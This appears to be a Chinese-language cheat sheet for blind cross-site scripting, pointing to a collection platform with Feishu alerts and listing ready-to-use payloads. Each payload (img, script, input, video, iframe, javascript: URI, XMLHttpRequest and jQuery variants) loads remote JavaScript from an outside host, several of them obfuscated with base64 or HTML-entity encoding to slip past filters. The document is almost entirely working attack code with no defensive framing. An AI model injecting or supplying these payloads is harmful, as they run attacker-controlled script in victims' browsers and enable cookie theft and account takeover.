盲xss

https://conote.xsslse.xyz/xss

conote+飞书通知
payload如下
Import:
Script:
Input:
Img:
Video:
IFrame:
XMLHTTP:

"><img src='z' onerror=import('https://lse11.cn/Kq8Snzf8.js?n=0d1a98')>
"><script src=https://lse11.cn/Kq8Snzf8.js?n=0d1a98></script>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbHNlMTEuY24vS3E4U256ZjguanM/bj0wZDFhOTgiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbHNlMTEuY24vS3E4U256ZjguanM/bj0wZDFhOTgiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbHNlMTEuY24vS3E4U256ZjguanM/bj0wZDFhOTgiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
"><iframe srcdoc="&#0000060;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;&#0000118;&#0000097;&#0000114;&#0000032;&#0000097;&#0000061;&#0000112;&#0000097;&#0000114;&#0000101;&#0000110;&#0000116;&#0000046;&#0000100;&#0000111;&#0000099;&#0000117;&#0000109;&#0000101;&#0000110;&#0000116;&#0000046;&#0000099;&#0000114;&#0000101;&#0000097;&#0000116;&#0000101;&#0000069;&#0000108;&#0000101;&#0000109;&#0000101;&#0000110;&#0000116;&#0000040;&#0000034;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000034;&#0000041;&#0000059;&#0000097;&#0000046;&#0000115;&#0000114;&#0000099;&#0000061;&#0000034;&#0000104;&#0000116;&#0000116;&#0000112;&#0000115;&#0000058;&#0000047;&#0000047;&#0000108;&#0000115;&#0000101;&#0000049;&#0000049;&#0000046;&#0000099;&#0000110;&#0000047;&#0000075;&#0000113;&#0000056;&#0000083;&#0000110;&#0000122;&#0000102;&#0000056;&#0000046;&#0000106;&#0000115;&#0000063;&#0000110;&#0000061;&#0000048;&#0000100;&#0000049;&#0000097;&#0000057;&#0000056;&#0000034;&#0000059;&#0000112;&#0000097;&#0000114;&#0000101;&#0000110;&#0000116;&#0000046;&#0000100;&#0000111;&#0000099;&#0000117;&#0000109;&#0000101;&#0000110;&#0000116;&#0000046;&#0000098;&#0000111;&#0000100;&#0000121;&#0000046;&#0000097;&#0000112;&#0000112;&#0000101;&#0000110;&#0000100;&#0000067;&#0000104;&#0000105;&#0000108;&#0000100;&#0000040;&#0000097;&#0000041;&#0000059;&#0000060;&#0000047;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;">

JS-URI:

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://lse11.cn/Kq8Snzf8.js?n=0d1a98\';document.body.appendChild(a)')

JQuery:

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//lse11.cn/Kq8Snzf8.js?n=0d1a98");a.send();</script>
<script>$.getScript("//lse11.cn/Kq8Snzf8.js?n=0d1a98")</script>